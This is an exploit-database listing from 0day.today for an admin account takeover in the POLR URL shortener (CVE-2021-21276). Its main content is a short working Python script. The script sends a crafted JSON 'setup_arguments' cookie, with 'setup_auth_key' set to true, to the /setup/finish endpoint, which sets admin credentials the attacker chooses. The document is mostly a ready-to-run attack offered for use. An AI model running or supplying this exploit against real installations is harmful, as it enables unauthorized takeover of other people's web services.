[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

POLR URL 2.3.0 - Shortener Admin Account Takeover Exploit

Author
p4kl0nc4t
Risk
[
Security Risk Critical
]
0day-ID
0day-ID-38511
Category
web applications
Date add
06-04-2023
CVE
CVE-2021-21276
Platform
php
# Exploit Title: POLR URL 2.3.0 - Shortener Admin Takeover
# Exploit Author: p4kl0nc4t <me-at-lcat-dot-dev>
# Vendor Homepage: -
# Software Link: https://github.com/cydrobolt/polr
# Version: < 2.3.0
# Tested on: Linux
# CVE : CVE-2021-21276


import json

import requests

payload = {
    'acct_username': 'admin',
    'acct_password': 'password',
    'acct_email': 'email@youremail.com',
    'setup_auth_key': True,
}

r = requests.get('http://localhost/setup/finish',
                 cookies={'setup_arguments': json.dumps(payload)})
print(r.text)

#  0day.today [2024-07-07]  #